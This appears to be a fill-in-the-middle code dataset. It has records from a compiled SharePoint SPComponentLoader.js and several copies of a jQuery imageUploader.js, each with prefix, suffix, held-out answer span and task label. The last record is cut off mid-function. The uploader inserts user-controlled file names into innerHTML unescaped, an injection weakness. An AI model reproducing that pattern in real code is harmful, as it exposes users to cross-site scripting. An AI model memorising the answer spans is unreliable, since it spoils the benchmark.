SPComponentLoader.prototype._loadDebugManifestsForWorkbench = function (manifestsFileUrl) {
return DebugManager.loadAndRegisterManifestsFile(this, manifestsFileUrl, true);
};
/**
* {@inheritdoc ISPComponentLoader._startApplication}
*
* @internal
*/
SPComponentLoader.prototype._startApplication = function (preloadedData) {
return startApplication(preloadedData, this._serviceScope).then(function (app) {
/*
* Normally non-SPFx environments locate their SPFx host application via a window variable
* that our startup code assigns like this:
*
* global.moduleLoaderPromise = global.spModuleLoader.start(spClientSidePageContext, handleFailure)
*
* However, in the case of the modern ListView, the "listview-spfx-host" loads after the main scripts,
* which creates a race condition where window.moduleLoaderPromise sometimes might not be assigned yet
* when their code tries to read it. In that situation, they can register a callback like this:
*
* if (window['moduleLoaderPromise']) {
* window['moduleLoaderPromise'].then((application) => {
* doSomething(application);
* });
* } else {
* window['_spLoaderCallback'] = function(application) {
* doSomething(application);
* };
* }
*/
/* tslint:disable:no-string-literal */
if (window['_spLoaderCallback']) {
var _spLoaderCallback = window['_spLoaderCallback']; // tslint:disable-line:no-any
_spLoaderCallback(app);
}
/* tslint:enable:no-string-literal */
return app;
});
};
/**
* {@inheritdoc ISPComponentLoader._preloadComponents}
*
* @internal
*/
SPComponentLoader.prototype._preloadComponents = function () {
var _this = this;
if (!isOptimsticPreloadFilteredToViewPortKillswitchActivated() && document && document.head) {
var attributeName = 'data-sp-componentId';
var preloadElements = document.head.querySelectorAll("link[rel=preload][" + attributeName + "],script[" + attributeName + "]");
var preloadedIdSet = new Set();
for (var i = 0; i < preloadElements.length; i++) {
var componentId = preloadElements[i].getAttribute(attributeName);
if (componentId && !preloadedIdSet.has(componentId)) {
preloadedIdSet.add(componentId);
}
}
preloadedIdSet.forEach(function (id) {
var manifest = _this.tryGetManifestById(id);
if (manifest) {
// We don't need to care if these succeed or fail here, and are just focused on starting the load.
_this.loadComponent(manifest); // tslint:disable-line:no-floating-promises
}
});
}
else {
ManifestStore.instance.getRegisteredManifests(true).forEach(function (manifest) {
// We don't need to care if these succeed or fail here, and are just focused on starting the load.
_this.loadComponent(manifest); // tslint:disable-line:no-floating-promises
});
}
};
/**
* {@inheritdoc ISPComponentLoader._unloadComponents}
*
* @internal
*/
SPComponentLoader.prototype._unloadComponents = function () {
for (var _i = 0, _a = ManifestStore.instance.getRegisteredManifests(); _i < _a.length; _i++) {
var m = _a[_i];
ComponentStore.instance.deleteComponent(m.id, m.version);
this._loader.delete(m);
}
};
// #region Candidates for deletion
SPComponentLoader.prototype.registerManifests = function (manifests) {
ManifestStore.instance.registerManifests(manifests, false);
};
SPComponentLoader.prototype.requestManifest = function (id, version) {
return ManifestStore.instance.requestManifest(id, version);
};
SPComponentLoader.prototype.tryGetLoadedComponent = function (manifest) {
return ComponentStore.instance.tryGetComponentReference(manifest.id, manifest.version);
};
SPComponentLoader.prototype.tryGetManifestById = function (id, version) {
return ManifestStore.instance.tryGetManifest(id, version);
};
Object.defineProperty(SPComponentLoader.prototype, "_manifestReferences", {
get: function () {
return ManifestStore.instance.getRegisteredManifests();
},
enumerable: false,
configurable: true
});
SPComponentLoader.prototype._initialize = function (preloadedData, bundledComponents, debugData) {
/* no-op*/
};
return SPComponentLoader;
}());
export { SPComponentLoader };
//# sourceMappingURL=SPComponentLoader.js.map | SPComponentLoader | identifier_name |
imageUploader.js | var resizedImages = []; // array to hold resized photo files - used by evaluateAndResize()
var photoCounter = 1; // counter for multiple images - used by evaluateAndResize()
var uploadBtnClasses = document.getElementById('btn_upload_photos').classList; // called multiple places
var deletePhotos = []; // array to hold names of uploaded photos marked for deletion
// Compare uploaded image file signature against known MIME types
// Add more from: http://en.wikipedia.org/wiki/List_of_file_signatures
function evaluateFileSignature(headerString) {
switch (headerString) {
case "89504e47":
type = "image/png";
break;
case "47494638":
type = "image/gif";
break;
case "ffd8ffe0":
case "ffd8ffe1":
case "ffd8ffe2":
type = "image/jpeg";
break;
default:
type = "unknown";
break;
}
return type;
}
// Instantiate fileReader object, collect file signature and retrieve MIME type
function getMimeType(file, callback) {
var fileReader = new FileReader(); // instantiate new FileReader object
fileReader.onloadend = function(e) { // after file is loaded...
var arr = (new Uint8Array(e.target.result)).subarray(0, 4); // get file signature
var header = ""; // tranlsate file signature from decimal to hex for easier comparison
for(var i = 0; i < arr.length; i++) { header += arr[i].toString(16); }
var mimeType = evaluateFileSignature(header);
callback(mimeType); // retrieve mimeType for evaluation via evaluateMimeType()
};
fileReader.readAsArrayBuffer(file); // asynchronous function call
}
// Output uploaded image as a resized (semi) base64-encoded image string
function resizeImage(url, callback) {
var img = new Image;
var canvas = document.createElement("canvas");
var ctx=canvas.getContext("2d");
var cw=canvas.width;
var ch=canvas.height;
var maxW=250; // limit the image to 250x250 maximum size
var maxH=750;
img.onload = function() {
var iw=img.width;
var ih=img.height;
var scale=Math.min((maxW/iw),(maxH/ih));
var iwScaled=iw*scale;
var ihScaled=ih*scale;
canvas.width=iwScaled;
canvas.height=ihScaled;
ctx.drawImage(img,0,0,iwScaled,ihScaled);
resized = canvas.toDataURL(); // converted image as base64-encoded string
callback(resized);
}
img.src = url
}
// Convert base64 string to blob for image preview & file operations
function b64toBlob(b64Data, contentType, sliceSize) {
var contentType = contentType || '';
var sliceSize = sliceSize || 512;
var byteCharacters = atob(b64Data);
var byteArrays = [];
for (var offset = 0; offset < byteCharacters.length; offset += sliceSize) {
var slice = byteCharacters.slice(offset, offset + sliceSize);
var byteNumbers = new Array(slice.length);
for (var i = 0; i < slice.length; i++) {
byteNumbers[i] = slice.charCodeAt(i);
}
var byteArray = new Uint8Array(byteNumbers);
byteArrays.push(byteArray);
}
var blob = new Blob(byteArrays, {type: contentType});
return blob;
}
// Delete photo <td> element and corresponding object from resizedImages array
function deletePhoto(td) {
// remove <td> element from table row
var row = document.getElementById("more-photos");
for (var i = 0; i < row.children.length; i++) {
if (row.children[i] === td) { row.deleteCell(i); }
}
// remove photo from resizedImages array
var selectedPhoto = td.children[0].id;
for (var j = 0; j < resizedImages.length; j++ ) {
if (resizedImages[j].filename === selectedPhoto) { delete resizedImages[j]; }
}
// filter undefined element from array if photo element deleted
resizedImages = resizedImages.filter(function(k) { return k != undefined });
// hide Upload button and remove message if last photo element deleted
if ($("#photo_table tr td").length === 0) {
uploadBtnClasses.add('btnHide');
document.getElementById('hide_upload_status').style.display = "none";
}
}
// Adjust div size after image file loads - line 170: onload="resizeDiv()"
function resizeDiv() {
var panel = document.getElementById("imgUploaderPanel");
panel.style.maxHeight = panel.scrollHeight + "px"; // recalculate height
}
// Validate, resize, encode and preview image file
function evaluateAndResize(file) {
var fileName = file["name"].slice(0, -4) + ".png"; // image name to use with blob (resized output = PNG)
// determine file signature via magic numbers
getMimeType(file, evaluateMimeType); // fire off MIME type retrieval (asynchronous)
// callback function called in getMimeType() to evaluate mimeType for uploaded file
function evaluateMimeType(mimeType) {
if (mimeType === "unknown") {
alert("Invalid file type - please load a valid image file.");
} else {
url = URL.createObjectURL(file); // create Object URL for resizing photo
resizeImage(url, getBase64StringMulti); // fire off base64-encoded image string retrieval (asynchronous)
// callback function called in resizeImage() to get resized base64-encoded image string and output to div
function getBase64StringMulti(resized) {
var stringDataTypeFull = resized.split(';')[0];
var stringDataType = stringDataTypeFull.split(':')[1]; // get data type for blob conversion
var stringBase64 = resized.split(',')[1]; // get base64 string for blob conversion - iVBORw0KGgoAAAA...
var blob = b64toBlob(stringBase64, stringDataType); // encode base64 string as blob for preview & file ops
var blobUrl = URL.createObjectURL(blob); // create Object URL for image preview of resized image
img = document.createElement("img"); // use resized image (blobUrl) for image preview
img.src = blobUrl;
document.getElementById(fileName).src = blobUrl;
resizedImages.push({filename: fileName, data: resized}); // push photo filename & data to array
}
}
}
var imgRowDiv = document.getElementById("more-photos");
// append img to more-photos td element if not already added (line 18 in photo_upload.erb)
if (!imgRowDiv.innerHTML.includes(fileName)) {
imgRowDiv.innerHTML += '<td class="img-container" onclick="deletePhoto(this)">\
<img img src="" class="target-img" id=' + fileName + ' onload="resizeDiv()">\
<div class="overlay">\
<div class="nonEditorButton">Remove</div>\
</div>\
</td>';
}
// show Upload button and display message
if ($("#photo_table tr td").length > 0) {
uploadBtnClasses.remove('btnHide');
document.getElementById('hide_upload_status').style.display = "inline";
$("#upload_status").text("Select a photo to remove it from the list.").show();
}
photoCounter += 1;
}
// Iterate through photos object and pass each photo to evaluateAndResize()
function processFileList() {
var input = document.querySelector("#photos");
var files = input.files;
for (i = 0; i < files.length; i++) {
evaluateAndResize(files[i]);
}
}
// POST filename and data for all photos in resizedImages array when Upload button is clicked
$("#btn_upload_photos").on("click", function() {
var width = 0; // initialize width of progress bar (outside progress_bar() so persistent)
var progress = 0; // initialize progress (% of photos uploaded)
// remove "Select a photo..." message
if ($("#upload_status").text() === "Select a photo to remove it from the list.") {
document.getElementById('hide_upload_status').style.display = "none";
}
// Message if Upload button is clicked and no photos were selected
if (resizedImages.length === 0) {
document.getElementById('hide_upload_status').style.display = "inline";
$("#upload_status").text("You didn't upload any photos - please try again.").show();
}
// Changes after uploads have completed
function uploadStatus(length) {
if (length > 0) {
document.getElementById('hide_upload_status').style.display = "inline";
// find all img elements in more-photos tr and remove target-img class
var img = $("#more-photos").find("img");
img.removeClass("target-img");
img.addClass("uploaded-img");
// remove onclick function and overlay divs
var cells = $("#more-photos").find("td");
for (var i = 0; i < cells.length; i++) |
// message with photo upload status
$("#upload_status").html("Your photos have successfully uploaded.<br>Please note that it will take a moment to process them.").show();
updateButtons();
}
}
// POST the photo name and data to /queue_photos route via an AJAX request
function queuePhotos(file, index, length) {
$.ajax({
url: "/queue_photos",
type: 'POST',
data: {filename: file.filename, data: file.data},
success: function(data, status, xhr) {},
complete: function(data, status, xhr) {
if (index + 1 === length) { // if this is the last photo
uploadPhotos();
}
}
});
}
// Trigger /upload_photos route to start processing photo data from photo queue
function uploadPhotos() {
$.ajax({
url: "/upload_photos",
type: 'POST',
data: {photoUploadStatus: "OK"},
success: function(data, status, xhr) {}
});
}
// Incrementally draw a progress bar based on photo upload completion
function photoProgressBar(progress, length) {
var elem = document.getElementById("photo_progress");
var speed = 20 * length; // integer determines speed of progress bar draw
var id = setInterval(frame, speed);
function frame() {
if (width >= progress) {
clearInterval(id);
} else {
width++;
elem.style.width = width + '%';
elem.innerHTML = width * 1 + '%';
if (width === 100) {
uploadStatus(length); // message once all photos uploaded
}
}
}
}
// Sets display style for photo progress bar div so it is visible
function showPhotoProgress() {
document.getElementById('hide_ajax_progress').style.display = "inline";
}
// Hide Upload button and show Upload More Photos and Return Home buttons after clicking Upload button
function updateButtons() {
var uploadMoreBtnClasses = document.getElementById('btn_more_photos').classList;
if (uploadMoreBtnClasses.contains('btnHide')) {
uploadBtnClasses.add('btnHide');
uploadMoreBtnClasses.remove('btnHide');
}
}
// Iterate through the resizedImages array and queue each photo via AJAX request
$("#ajax_write").submit(function(event) {
event.preventDefault(); // suppress the default behavior for the form submit button
$.each(resizedImages, function(index, file) {
var length = resizedImages.length;
queuePhotos(file, index, length); // AJAX request to queue photo
progress = (index + 1) * 100 / length; // percentage of image upload completion (integer)
showPhotoProgress();
photoProgressBar(progress, length);
});
// Hide the Select Photo button after clicking Upload if there are any photos
if ($("#photo_table tr td").length > 0) {
document.getElementById('select_photo_button').style.display = "none";
}
resizedImages = []; // flush the array
photoCounter = 1; // reset the counter
});
});
// Hide "You didn't upload any photos..." message if it is showing after clicking Select Photo button
$("#photos").on("click", function() {
var uploadMsg = document.getElementById('hide_upload_status').style.display;
if (uploadMsg === "inline" && $("#upload_status").text() !== "Select a photo to remove it from the list.") {
document.getElementById('upload_status').style.display = "none";
}
});
// Add photo to deletePhotos array when selected
function selectPhoto(td) {
var overlayCheckbox = td.childNodes[3].childNodes[1];
var overlayClasses = td.childNodes[3].classList;
var delPhotosClasses = document.getElementById('btn_del_photos').classList;
// get the photo name from the S3 URL
imgSrc = td.childNodes[1].src;
imgName = imgSrc.replace(/^(.*[/\\])?/, '').replace(/(\?[^.]*)$/, '')
// if deletePhotos array doesn't have photo name, add it & show checkbox
if (!deletePhotos.includes(imgName)) {
deletePhotos.push(imgName);
overlayCheckbox.checked = true;
overlayClasses.remove('rmv-opacity');
delPhotosClasses.remove('btnHide');
resizeDiv();
} else { // otherwise, delete it from deletePhotos array & clear checkbox
var index = deletePhotos.indexOf(imgName);
if (index > -1) {
deletePhotos.splice(index, 1);
}
overlayCheckbox.checked = false;
overlayClasses.add('rmv-opacity');
if (deletePhotos.length === 0) {
delPhotosClasses.add('btnHide');
}
}
}
// POSTs the image names in deletePhotos array
$("#btn_del_photos").on("click", function() {
post('/delete_photos', {selected: deletePhotos});
}); | {
cells[i].onclick = null;
cells[i].removeChild(cells[i].childNodes[3]);
} | conditional_block |
imageUploader.js | var resizedImages = []; // array to hold resized photo files - used by evaluateAndResize()
var photoCounter = 1; // counter for multiple images - used by evaluateAndResize()
var uploadBtnClasses = document.getElementById('btn_upload_photos').classList; // called multiple places
var deletePhotos = []; // array to hold names of uploaded photos marked for deletion
// Compare uploaded image file signature against known MIME types
// Add more from: http://en.wikipedia.org/wiki/List_of_file_signatures
function evaluateFileSignature(headerString) {
switch (headerString) {
case "89504e47":
type = "image/png";
break;
case "47494638":
type = "image/gif";
break;
case "ffd8ffe0":
case "ffd8ffe1":
case "ffd8ffe2":
type = "image/jpeg";
break;
default:
type = "unknown";
break;
}
return type;
}
// Instantiate fileReader object, collect file signature and retrieve MIME type
function getMimeType(file, callback) {
var fileReader = new FileReader(); // instantiate new FileReader object
fileReader.onloadend = function(e) { // after file is loaded...
var arr = (new Uint8Array(e.target.result)).subarray(0, 4); // get file signature
var header = ""; // tranlsate file signature from decimal to hex for easier comparison
for(var i = 0; i < arr.length; i++) { header += arr[i].toString(16); }
var mimeType = evaluateFileSignature(header);
callback(mimeType); // retrieve mimeType for evaluation via evaluateMimeType()
};
fileReader.readAsArrayBuffer(file); // asynchronous function call
}
// Output uploaded image as a resized (semi) base64-encoded image string
function resizeImage(url, callback) {
var img = new Image;
var canvas = document.createElement("canvas");
var ctx=canvas.getContext("2d");
var cw=canvas.width;
var ch=canvas.height;
var maxW=250; // limit the image to 250x250 maximum size
var maxH=750;
img.onload = function() {
var iw=img.width;
var ih=img.height;
var scale=Math.min((maxW/iw),(maxH/ih));
var iwScaled=iw*scale;
var ihScaled=ih*scale;
canvas.width=iwScaled;
canvas.height=ihScaled;
ctx.drawImage(img,0,0,iwScaled,ihScaled);
resized = canvas.toDataURL(); // converted image as base64-encoded string
callback(resized);
}
img.src = url
}
// Convert base64 string to blob for image preview & file operations
function b64toBlob(b64Data, contentType, sliceSize) {
var contentType = contentType || '';
var sliceSize = sliceSize || 512;
var byteCharacters = atob(b64Data);
var byteArrays = [];
for (var offset = 0; offset < byteCharacters.length; offset += sliceSize) {
var slice = byteCharacters.slice(offset, offset + sliceSize);
var byteNumbers = new Array(slice.length);
for (var i = 0; i < slice.length; i++) {
byteNumbers[i] = slice.charCodeAt(i);
}
var byteArray = new Uint8Array(byteNumbers);
byteArrays.push(byteArray);
}
var blob = new Blob(byteArrays, {type: contentType});
return blob;
}
// Delete photo <td> element and corresponding object from resizedImages array
function deletePhoto(td) {
// remove <td> element from table row
var row = document.getElementById("more-photos");
for (var i = 0; i < row.children.length; i++) {
if (row.children[i] === td) { row.deleteCell(i); }
}
// remove photo from resizedImages array
var selectedPhoto = td.children[0].id;
for (var j = 0; j < resizedImages.length; j++ ) {
if (resizedImages[j].filename === selectedPhoto) { delete resizedImages[j]; }
}
// filter undefined element from array if photo element deleted
resizedImages = resizedImages.filter(function(k) { return k != undefined });
// hide Upload button and remove message if last photo element deleted
if ($("#photo_table tr td").length === 0) {
uploadBtnClasses.add('btnHide');
document.getElementById('hide_upload_status').style.display = "none";
}
}
// Adjust div size after image file loads - line 170: onload="resizeDiv()"
function resizeDiv() {
var panel = document.getElementById("imgUploaderPanel");
panel.style.maxHeight = panel.scrollHeight + "px"; // recalculate height
}
// Validate, resize, encode and preview image file
function evaluateAndResize(file) {
var fileName = file["name"].slice(0, -4) + ".png"; // image name to use with blob (resized output = PNG)
// determine file signature via magic numbers
getMimeType(file, evaluateMimeType); // fire off MIME type retrieval (asynchronous)
// callback function called in getMimeType() to evaluate mimeType for uploaded file
function evaluateMimeType(mimeType) {
if (mimeType === "unknown") {
alert("Invalid file type - please load a valid image file.");
} else {
url = URL.createObjectURL(file); // create Object URL for resizing photo
resizeImage(url, getBase64StringMulti); // fire off base64-encoded image string retrieval (asynchronous)
// callback function called in resizeImage() to get resized base64-encoded image string and output to div
function getBase64StringMulti(resized) {
var stringDataTypeFull = resized.split(';')[0];
var stringDataType = stringDataTypeFull.split(':')[1]; // get data type for blob conversion
var stringBase64 = resized.split(',')[1]; // get base64 string for blob conversion - iVBORw0KGgoAAAA...
var blob = b64toBlob(stringBase64, stringDataType); // encode base64 string as blob for preview & file ops
var blobUrl = URL.createObjectURL(blob); // create Object URL for image preview of resized image
img = document.createElement("img"); // use resized image (blobUrl) for image preview
img.src = blobUrl;
document.getElementById(fileName).src = blobUrl;
resizedImages.push({filename: fileName, data: resized}); // push photo filename & data to array
}
}
}
var imgRowDiv = document.getElementById("more-photos");
// append img to more-photos td element if not already added (line 18 in photo_upload.erb)
if (!imgRowDiv.innerHTML.includes(fileName)) {
imgRowDiv.innerHTML += '<td class="img-container" onclick="deletePhoto(this)">\
<img img src="" class="target-img" id=' + fileName + ' onload="resizeDiv()">\
<div class="overlay">\
<div class="nonEditorButton">Remove</div>\
</div>\
</td>';
}
// show Upload button and display message
if ($("#photo_table tr td").length > 0) {
uploadBtnClasses.remove('btnHide');
document.getElementById('hide_upload_status').style.display = "inline";
$("#upload_status").text("Select a photo to remove it from the list.").show();
}
photoCounter += 1;
}
// Iterate through photos object and pass each photo to evaluateAndResize()
function processFileList() {
var input = document.querySelector("#photos");
var files = input.files;
for (i = 0; i < files.length; i++) {
evaluateAndResize(files[i]);
}
}
// POST filename and data for all photos in resizedImages array when Upload button is clicked
$("#btn_upload_photos").on("click", function() {
var width = 0; // initialize width of progress bar (outside progress_bar() so persistent)
var progress = 0; // initialize progress (% of photos uploaded)
// remove "Select a photo..." message
if ($("#upload_status").text() === "Select a photo to remove it from the list.") {
document.getElementById('hide_upload_status').style.display = "none";
}
// Message if Upload button is clicked and no photos were selected
if (resizedImages.length === 0) {
document.getElementById('hide_upload_status').style.display = "inline";
$("#upload_status").text("You didn't upload any photos - please try again.").show();
}
// Changes after uploads have completed
function uploadStatus(length) {
if (length > 0) {
document.getElementById('hide_upload_status').style.display = "inline";
// find all img elements in more-photos tr and remove target-img class
var img = $("#more-photos").find("img");
img.removeClass("target-img");
img.addClass("uploaded-img");
// remove onclick function and overlay divs
var cells = $("#more-photos").find("td");
for (var i = 0; i < cells.length; i++) {
cells[i].onclick = null;
cells[i].removeChild(cells[i].childNodes[3]);
}
// message with photo upload status
$("#upload_status").html("Your photos have successfully uploaded.<br>Please note that it will take a moment to process them.").show();
updateButtons();
}
}
// POST the photo name and data to /queue_photos route via an AJAX request
function | (file, index, length) {
$.ajax({
url: "/queue_photos",
type: 'POST',
data: {filename: file.filename, data: file.data},
success: function(data, status, xhr) {},
complete: function(data, status, xhr) {
if (index + 1 === length) { // if this is the last photo
uploadPhotos();
}
}
});
}
// Trigger /upload_photos route to start processing photo data from photo queue
function uploadPhotos() {
$.ajax({
url: "/upload_photos",
type: 'POST',
data: {photoUploadStatus: "OK"},
success: function(data, status, xhr) {}
});
}
// Incrementally draw a progress bar based on photo upload completion
function photoProgressBar(progress, length) {
var elem = document.getElementById("photo_progress");
var speed = 20 * length; // integer determines speed of progress bar draw
var id = setInterval(frame, speed);
function frame() {
if (width >= progress) {
clearInterval(id);
} else {
width++;
elem.style.width = width + '%';
elem.innerHTML = width * 1 + '%';
if (width === 100) {
uploadStatus(length); // message once all photos uploaded
}
}
}
}
// Sets display style for photo progress bar div so it is visible
function showPhotoProgress() {
document.getElementById('hide_ajax_progress').style.display = "inline";
}
// Hide Upload button and show Upload More Photos and Return Home buttons after clicking Upload button
function updateButtons() {
var uploadMoreBtnClasses = document.getElementById('btn_more_photos').classList;
if (uploadMoreBtnClasses.contains('btnHide')) {
uploadBtnClasses.add('btnHide');
uploadMoreBtnClasses.remove('btnHide');
}
}
// Iterate through the resizedImages array and queue each photo via AJAX request
$("#ajax_write").submit(function(event) {
event.preventDefault(); // suppress the default behavior for the form submit button
$.each(resizedImages, function(index, file) {
var length = resizedImages.length;
queuePhotos(file, index, length); // AJAX request to queue photo
progress = (index + 1) * 100 / length; // percentage of image upload completion (integer)
showPhotoProgress();
photoProgressBar(progress, length);
});
// Hide the Select Photo button after clicking Upload if there are any photos
if ($("#photo_table tr td").length > 0) {
document.getElementById('select_photo_button').style.display = "none";
}
resizedImages = []; // flush the array
photoCounter = 1; // reset the counter
});
});
// Hide "You didn't upload any photos..." message if it is showing after clicking Select Photo button
$("#photos").on("click", function() {
var uploadMsg = document.getElementById('hide_upload_status').style.display;
if (uploadMsg === "inline" && $("#upload_status").text() !== "Select a photo to remove it from the list.") {
document.getElementById('upload_status').style.display = "none";
}
});
// Add photo to deletePhotos array when selected
function selectPhoto(td) {
var overlayCheckbox = td.childNodes[3].childNodes[1];
var overlayClasses = td.childNodes[3].classList;
var delPhotosClasses = document.getElementById('btn_del_photos').classList;
// get the photo name from the S3 URL
imgSrc = td.childNodes[1].src;
imgName = imgSrc.replace(/^(.*[/\\])?/, '').replace(/(\?[^.]*)$/, '')
// if deletePhotos array doesn't have photo name, add it & show checkbox
if (!deletePhotos.includes(imgName)) {
deletePhotos.push(imgName);
overlayCheckbox.checked = true;
overlayClasses.remove('rmv-opacity');
delPhotosClasses.remove('btnHide');
resizeDiv();
} else { // otherwise, delete it from deletePhotos array & clear checkbox
var index = deletePhotos.indexOf(imgName);
if (index > -1) {
deletePhotos.splice(index, 1);
}
overlayCheckbox.checked = false;
overlayClasses.add('rmv-opacity');
if (deletePhotos.length === 0) {
delPhotosClasses.add('btnHide');
}
}
}
// POSTs the image names in deletePhotos array
$("#btn_del_photos").on("click", function() {
post('/delete_photos', {selected: deletePhotos});
}); | queuePhotos | identifier_name |
imageUploader.js | var resizedImages = []; // array to hold resized photo files - used by evaluateAndResize()
var photoCounter = 1; // counter for multiple images - used by evaluateAndResize()
var uploadBtnClasses = document.getElementById('btn_upload_photos').classList; // called multiple places
var deletePhotos = []; // array to hold names of uploaded photos marked for deletion
// Compare uploaded image file signature against known MIME types
// Add more from: http://en.wikipedia.org/wiki/List_of_file_signatures
function evaluateFileSignature(headerString) {
switch (headerString) {
case "89504e47":
type = "image/png";
break;
case "47494638":
type = "image/gif";
break;
case "ffd8ffe0":
case "ffd8ffe1":
case "ffd8ffe2":
type = "image/jpeg";
break;
default:
type = "unknown";
break;
}
return type;
}
// Instantiate fileReader object, collect file signature and retrieve MIME type
function getMimeType(file, callback) {
var fileReader = new FileReader(); // instantiate new FileReader object
fileReader.onloadend = function(e) { // after file is loaded...
var arr = (new Uint8Array(e.target.result)).subarray(0, 4); // get file signature
var header = ""; // tranlsate file signature from decimal to hex for easier comparison
for(var i = 0; i < arr.length; i++) { header += arr[i].toString(16); }
var mimeType = evaluateFileSignature(header);
callback(mimeType); // retrieve mimeType for evaluation via evaluateMimeType()
};
fileReader.readAsArrayBuffer(file); // asynchronous function call
}
// Output uploaded image as a resized (semi) base64-encoded image string
function resizeImage(url, callback) {
var img = new Image;
var canvas = document.createElement("canvas");
var ctx=canvas.getContext("2d");
var cw=canvas.width;
var ch=canvas.height;
var maxW=250; // limit the image to 250x250 maximum size
var maxH=750;
img.onload = function() {
var iw=img.width;
var ih=img.height;
var scale=Math.min((maxW/iw),(maxH/ih));
var iwScaled=iw*scale;
var ihScaled=ih*scale;
canvas.width=iwScaled;
canvas.height=ihScaled;
ctx.drawImage(img,0,0,iwScaled,ihScaled);
resized = canvas.toDataURL(); // converted image as base64-encoded string
callback(resized);
}
img.src = url
}
// Convert base64 string to blob for image preview & file operations
function b64toBlob(b64Data, contentType, sliceSize) {
var contentType = contentType || '';
var sliceSize = sliceSize || 512;
var byteCharacters = atob(b64Data);
var byteArrays = [];
for (var offset = 0; offset < byteCharacters.length; offset += sliceSize) {
var slice = byteCharacters.slice(offset, offset + sliceSize);
var byteNumbers = new Array(slice.length);
for (var i = 0; i < slice.length; i++) {
byteNumbers[i] = slice.charCodeAt(i);
}
var byteArray = new Uint8Array(byteNumbers);
byteArrays.push(byteArray);
}
var blob = new Blob(byteArrays, {type: contentType});
return blob;
}
// Delete photo <td> element and corresponding object from resizedImages array
function deletePhoto(td) {
// remove <td> element from table row
var row = document.getElementById("more-photos");
for (var i = 0; i < row.children.length; i++) {
if (row.children[i] === td) { row.deleteCell(i); }
}
// remove photo from resizedImages array
var selectedPhoto = td.children[0].id;
for (var j = 0; j < resizedImages.length; j++ ) {
if (resizedImages[j].filename === selectedPhoto) { delete resizedImages[j]; }
}
// filter undefined element from array if photo element deleted
resizedImages = resizedImages.filter(function(k) { return k != undefined });
// hide Upload button and remove message if last photo element deleted
if ($("#photo_table tr td").length === 0) {
uploadBtnClasses.add('btnHide');
document.getElementById('hide_upload_status').style.display = "none";
}
}
// Adjust div size after image file loads - line 170: onload="resizeDiv()"
function resizeDiv() {
var panel = document.getElementById("imgUploaderPanel");
panel.style.maxHeight = panel.scrollHeight + "px"; // recalculate height
}
// Validate, resize, encode and preview image file
function evaluateAndResize(file) {
var fileName = file["name"].slice(0, -4) + ".png"; // image name to use with blob (resized output = PNG)
// determine file signature via magic numbers
getMimeType(file, evaluateMimeType); // fire off MIME type retrieval (asynchronous)
// callback function called in getMimeType() to evaluate mimeType for uploaded file
function evaluateMimeType(mimeType) {
if (mimeType === "unknown") {
alert("Invalid file type - please load a valid image file.");
} else {
url = URL.createObjectURL(file); // create Object URL for resizing photo
resizeImage(url, getBase64StringMulti); // fire off base64-encoded image string retrieval (asynchronous)
// callback function called in resizeImage() to get resized base64-encoded image string and output to div
function getBase64StringMulti(resized) {
var stringDataTypeFull = resized.split(';')[0];
var stringDataType = stringDataTypeFull.split(':')[1]; // get data type for blob conversion
var stringBase64 = resized.split(',')[1]; // get base64 string for blob conversion - iVBORw0KGgoAAAA...
var blob = b64toBlob(stringBase64, stringDataType); // encode base64 string as blob for preview & file ops
var blobUrl = URL.createObjectURL(blob); // create Object URL for image preview of resized image
img = document.createElement("img"); // use resized image (blobUrl) for image preview
img.src = blobUrl;
document.getElementById(fileName).src = blobUrl;
resizedImages.push({filename: fileName, data: resized}); // push photo filename & data to array
}
}
}
var imgRowDiv = document.getElementById("more-photos");
// append img to more-photos td element if not already added (line 18 in photo_upload.erb)
if (!imgRowDiv.innerHTML.includes(fileName)) {
imgRowDiv.innerHTML += '<td class="img-container" onclick="deletePhoto(this)">\
<img img src="" class="target-img" id=' + fileName + ' onload="resizeDiv()">\
<div class="overlay">\
<div class="nonEditorButton">Remove</div>\
</div>\
</td>';
}
// show Upload button and display message
if ($("#photo_table tr td").length > 0) {
uploadBtnClasses.remove('btnHide');
document.getElementById('hide_upload_status').style.display = "inline";
$("#upload_status").text("Select a photo to remove it from the list.").show();
}
photoCounter += 1;
}
// Iterate through photos object and pass each photo to evaluateAndResize()
function processFileList() {
var input = document.querySelector("#photos");
var files = input.files;
for (i = 0; i < files.length; i++) {
evaluateAndResize(files[i]);
}
}
// POST filename and data for all photos in resizedImages array when Upload button is clicked
$("#btn_upload_photos").on("click", function() {
var width = 0; // initialize width of progress bar (outside progress_bar() so persistent)
var progress = 0; // initialize progress (% of photos uploaded)
// remove "Select a photo..." message
if ($("#upload_status").text() === "Select a photo to remove it from the list.") {
document.getElementById('hide_upload_status').style.display = "none";
}
// Message if Upload button is clicked and no photos were selected
if (resizedImages.length === 0) {
document.getElementById('hide_upload_status').style.display = "inline";
$("#upload_status").text("You didn't upload any photos - please try again.").show();
}
// Changes after uploads have completed
function uploadStatus(length) {
if (length > 0) {
document.getElementById('hide_upload_status').style.display = "inline";
// find all img elements in more-photos tr and remove target-img class
var img = $("#more-photos").find("img");
img.removeClass("target-img");
img.addClass("uploaded-img");
// remove onclick function and overlay divs
var cells = $("#more-photos").find("td");
for (var i = 0; i < cells.length; i++) {
cells[i].onclick = null;
cells[i].removeChild(cells[i].childNodes[3]);
}
// message with photo upload status
$("#upload_status").html("Your photos have successfully uploaded.<br>Please note that it will take a moment to process them.").show();
updateButtons();
}
}
// POST the photo name and data to /queue_photos route via an AJAX request
function queuePhotos(file, index, length) |
// Trigger /upload_photos route to start processing photo data from photo queue
function uploadPhotos() {
$.ajax({
url: "/upload_photos",
type: 'POST',
data: {photoUploadStatus: "OK"},
success: function(data, status, xhr) {}
});
}
// Incrementally draw a progress bar based on photo upload completion
function photoProgressBar(progress, length) {
var elem = document.getElementById("photo_progress");
var speed = 20 * length; // integer determines speed of progress bar draw
var id = setInterval(frame, speed);
function frame() {
if (width >= progress) {
clearInterval(id);
} else {
width++;
elem.style.width = width + '%';
elem.innerHTML = width * 1 + '%';
if (width === 100) {
uploadStatus(length); // message once all photos uploaded
}
}
}
}
// Sets display style for photo progress bar div so it is visible
function showPhotoProgress() {
document.getElementById('hide_ajax_progress').style.display = "inline";
}
// Hide Upload button and show Upload More Photos and Return Home buttons after clicking Upload button
function updateButtons() {
var uploadMoreBtnClasses = document.getElementById('btn_more_photos').classList;
if (uploadMoreBtnClasses.contains('btnHide')) {
uploadBtnClasses.add('btnHide');
uploadMoreBtnClasses.remove('btnHide');
}
}
// Iterate through the resizedImages array and queue each photo via AJAX request
$("#ajax_write").submit(function(event) {
event.preventDefault(); // suppress the default behavior for the form submit button
$.each(resizedImages, function(index, file) {
var length = resizedImages.length;
